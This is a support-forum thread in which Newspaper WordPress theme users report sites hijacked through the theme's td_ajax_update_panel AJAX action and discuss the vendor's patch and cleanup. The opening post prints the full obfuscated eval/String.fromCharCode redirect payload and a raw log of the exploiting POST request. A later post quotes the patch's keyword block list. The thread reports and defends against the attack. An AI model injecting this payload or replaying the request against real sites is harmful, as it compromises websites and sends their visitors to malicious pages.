Critital Security Threat in Newspaper

Posted in: Newspaper
Post count: 9

We’re experiencing a CRITICAL issue across multiple Newspaper websites. Somehow an unauthorized user is able to upload a plugin through admin-ajax.php and inject the redirect script to: Theme Panel -> Custom Code -> Custom Javascript

It’s being posted to tagdiv custom javascript through action=td_ajax_update_panel.

It seems that this is a widespread issue on Newspaper and needs an urgent patch!

This is being reported by others also
https://forum.tagdiv.com/topic/jskryptik-co-trojan-found-in-composer-plugin/#post-457869

The script that’s being injected is:

eval(String.fromCharCode(118,97,114,32,112,115,100,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,100,100,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,32,61,61,32,34,115,108,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,101,99,116,114,101,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,48,44,49,48,49,44,49,49,57,44,49,49,53,44,52,54,44,49,49,57,44,49,48,49,44,57,55,44,49,49,54,44,49,48,52,44,49,48,49,44,49,49,52,44,49,49,50,44,49,48,56,44,49,48,56,44,49,48,56,44,57,55,44,49,49,54,44,49,48,50,44,49,49,49,44,49,49,52,44,49,48,57,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,57,57,44,49,49,49,44,49,49,55,44,49,49,48,44,49,49,54,44,49,48,49,44,49,49,52,44,49,49,53,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,52,57,44,52,54,44,53,48,44,53,49,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));

This is the action:

135.125.178.115 – – [11/Nov/2022:20:26:49 +0000] “POST /wp-admin/admin-ajax.php HTTP/1.0” 200 1 “https://site-url-removed.com/wp-admin/admin-ajax.php” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0” 0.000 1.588 1.588 200 1.588 action=td_ajax_update_panel&td_magic_token=c8ae20cbbe&td_option%5Btds_custom_javascript%5D=eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C112%2C115%2C100%2C100%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C115%2C99%2C114%2C105%2C112%2C116%2C34%2C41%2C59%2C32%2C118%2C97%2C114%2C32%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C32%2C61%2C32%2C102%2C97%2C108%2C115%2C101%2C59%2C102%2C111%2C114%2C32%2C40%2C118%2C97%2C114%2C32%2C105%2C32%2C61%2C32%2C48%2C59%2C32%2C105%2C32%2C60%2C32%2C112%2C115%2C100%2C100%2C46%2C108%2C101%2C110%2C103%2C116%2C104%2C59%2C32%2C105%2C43%2C43%2C41%2C32%2C123%2C32%2C32%2C32%2C105%2C102%2C32%2C40%2C112%2C115%2C100%2C100%2C91%2C105%2C93%2C46%2C105%2C100%2C41%2C32%2C123%2C32%2C32%2C32%2C9%2C32%2C105%2C102%2C32%2C40%2C112%2C115%2C100%2C100%2C91%2C105%2C93%2C46%2C105%2C100%2C32%2C61%2C61%2C32%2C34%2C115%2C108%2C101%2C99%2C116%2C114%2C101%2C112%2C111%2C105%2C110%2C116%2C34%2C41%2C123%2C32%2C9%2C9%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C61%2C116%2C114%2C117%2C101%2C59%2C32%2C9%2C32%2C125%2C32%2C32%2C32%2C125%2C32%2C32%2C125%2C105%2C102%2C40%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C61%2C61%2C102%2C97%2C108%2C115%2C101%2C41%2C123%2C32%2C9%2C118%2C97%2C114%2C32%2C100%2C61%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C59%2C118%2C97%2C114%2C32%2C115%2C61%2C100%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C115%2C46%2C105%2C100%2C61%2C34%2C115%2C108%2C101%2C99%2C116%2C114%2C101%2C112%2C111%2C105%2C110%2C116%2C34%2C59%2C115%2C46%2C115%2C114%2C99%2C61%2C83%2C116%2C114%2C105%2C110%2C103%2C46%2C102%2C114%2C111%2C109%2C67%2C104%2C97%2C114%2C67%2C111%2C100%2C101%2C40%2C49%2C48%2C52%2C44%2C49%2C49%2C54%2C44%2C49%2C49%2C54%2C44%2C49%2C49%2C50%2C44%2C49%2C49%2C53%2C44%2C53%2C56%2C44%2C52%2C55%2C44%2C52%2C55%2C44%2C49%2C49%2C48%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C57%2C44%2C49%2C49%2C53%2C44%2C52%2C54%2C44%2C49%2C49%2C57%2C44%2C49%2C48%2C49%2C44%2C57%2C55%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C52%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C49%2C50%2C44%2C49%2C48%2C56%2C44%2C49%2C48%2C56%2C44%2C49%2C48%2C56%2C44%2C57%2C55%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C50%2C44%2C49%2C49%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C48%2C57%2C44%2C52%2C54%2C44%2C57%2C57%2C44%2C49%2C49%2C49%2C44%2C49%2C48%2C57%2C44%2C52%2C55%2C44%2C57%2C57%2C44%2C49%2C49%2C49%2C44%2C49%2C49%2C55%2C44%2C49%2C49%2C48%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C49%2C53%2C44%2C52%2C54%2C44%2C49%2C48%2C54%2C44%2C49%2C49%2C53%2C44%2C54%2C51%2C44%2C49%2C49%2C56%2C44%2C54%2C49%2C44%2C52%2C57%2C44%2C52%2C57%2C44%2C52%2C54%2C44%2C53%2C48%2C44%2C53%2C49%2C41%2C59%2C32%2C105%2C102%2C32%2C40%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C41%2C32%2C123%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C46%2C112%2C97%2C114%2C101%2C110%2C116%2C78%2C111%2C100%2C101%2C46%2C105%2C110%2C115%2C101%2C114%2C116%2C66%2C101%2C102%2C111%2C114%2C101%2C40%2C115%2C44%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C41%2C59%2C125%2C32%2C101%2C108%2C115%2C101%2C32%2C123%2C100%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C39%2C104%2C101%2C97%2C100%2C39%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C115%2C41%2C59%2C125%2C32%2C125%29%29%3B

Post count: 113

+1 here, using newspapper 11.5.1

Would like to know if anyone with most recent version has the same issue.

Post count: 2

+1 for me! Found the same code reported by @walshcreative in customer JavaScript

Post count: 21

This keeps happening to me over and over. I remove the malware and it gets reuploaded the next day. When people go to my site, they are redirected to a spam website. How can I fix this?

Post count: 35449
Post count: 9

@Calin This is false. I have documented how the unauthorized users are gaining access to WordPress and redirecting the sites. Your patch issued in 12.1.1 is a poor bandaid and easily circumvented. This needs a proper fix.

Post count: 144

Okay, I just found your patch, and it is NOT a patch. It’s a bandaid at most. In td-composer/legacy/common/wp_booster/wp-admin/panel/panel_core/td_pannel_data_source.php:610 you have simply added in

// don't allow eval( / String.fromCharCode( as option value if ( td_util::strpos_array( $option_value, array( 'eval(', 'String.fromCharCode(' ) ) !== false ) { $option_value = ''; }
this does not fix the core problem of an unauthenticated user being able to use admin-ajax.php and your td_ajax_update_panel action and td_magic_token to inject anything they want. What if they just change their method and obfuscate their code, it will pass right by this “check” and sites will once again be infected.

Post count: 162

Faced this too! 🙁

Post count: 35449

Hello,
Indeed, the developers only put a restriction for that code so that it can no longer be set in the theme. Now, if the problem persists, after the theme update and the extra code and files have been checked and cleaned, there may be possible that some files to still be infected. If you want, in this situation if you contact us by email at contact@tagdiv.com and provide wp-admin and FTP access, we will check the files and what else could be infected to make this problem reappear.
Thank you!

Post count: 5

Good Morning!

Same here! So far I had 4 client websites infected – all running the Newspaper theme.

Post count: 35449

Hi hkaufmann, if there are still problems, please contact us by email and we will try to help you!

Post count: 5

Thank you, I have just sent you an email, because some sites still show signs of the infection!

Post count: 113

I have NOT being infected again, but I can see the same IPS (that I blocked, you can see here and in the other post related with this issue) are trying to repeatedly. My advise is to block them. Both are from OVH SAS hosting, famous for a lot of spam and hacking (I thought to block the entire ip range from this hosting, but finally I didn’t. Anyway I have to say that I have blocked dozens of them).

So, I will ask your developers to find a “more secure” solution to this malware than not to allow writing an “eval string” in theme panel. Think about it, cause it’s a real problem…

Also, If i were you (I mean newspaper support) I will ask to OVH SAS abuse department to look into this ips ranges. If they receive a mail or a call from an important theme developer like you, they will look into the problem with more emphasis than if they receive a mail from a “normal web admin”. Think about it too.

Post count: 35449

Hi,
Thank you for the suggestion. The problem with this malware (weatherplllatform) is that it is very easily installed in WordPress files, most of the users who contacted us no longer had that code in the theme panel, but it was present in the index.php files and even in wp- includes/js/jquery/jquery.min.js
After I cleaned all the files that I found infected, I asked the users to reset the passwords, especially for the administrators, and to be sure that the permission settings for the WordPress files are correctly set (usually these settings are checked by the host). So far, these users have not reported any problems following these steps.
Now if you say that you have different IPs that force the website, it means that they want to exploit the website and try to use the initial solution to re-infect you.
Thank you!

Viewing 14 posts - 1 through 14 (of 14 total)
You must be logged in to reply to this topic.